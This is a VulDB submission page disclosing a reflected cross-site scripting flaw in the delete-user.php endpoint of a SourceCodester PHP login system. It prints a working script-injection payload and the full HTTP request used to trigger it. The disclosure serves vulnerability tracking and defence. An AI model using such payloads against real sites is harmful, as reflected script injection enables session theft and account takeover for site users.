Submit #246052: https://www.sourcecodester.com/php/16890/user-registration-and-l User Registration and Login System 1.0 Cross-site Scripting attacksinfo

Titlehttps://www.sourcecodester.com/php/16890/user-registration-and-l User Registration and Login System 1.0 Cross-site Scripting attacks
DescriptionUser Registration and Login System by rems has xss (Reflected XSS) BUG_Author: hlhyp vendors: https://www.sourcecodester.com/php/16890/user-registration-and-login-system-using-php-source-code.html Vulnerability File: /endpoint/delete-user.php [+] payload: /endpoint/delete-user.php?user=1'"()%26%25<ScRiPt%20>alert(%27this%20has%20xss%27)</ScRiPt> GET /endpoint/delete-user.php?user=1'"()%26%25<zzz><ScRiPt%20>alert(%27this%20has%20xss%27)</ScRiPt> HTTP/1.1 Referer: http://192.168.6.1/ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Host: 192.168.6.1 Connection: Keep-alive
Source⚠️ https://github.com/qqisee/vulndis/blob/main/xss_delete_user.md
User
 hlhyp (UID 59415)
Submission12/01/2023 09:24 (3 years ago)
Moderation12/01/2023 17:05 (8 hours later)
StatusAccepted
VulDB entry246612 [SourceCodester User Registration and Login System 1.0 delete-user.php cross site scripting]
Points20

PreviousOverviewNext

Do you want to use VulDB in your project?

Use the official API to access entries easily!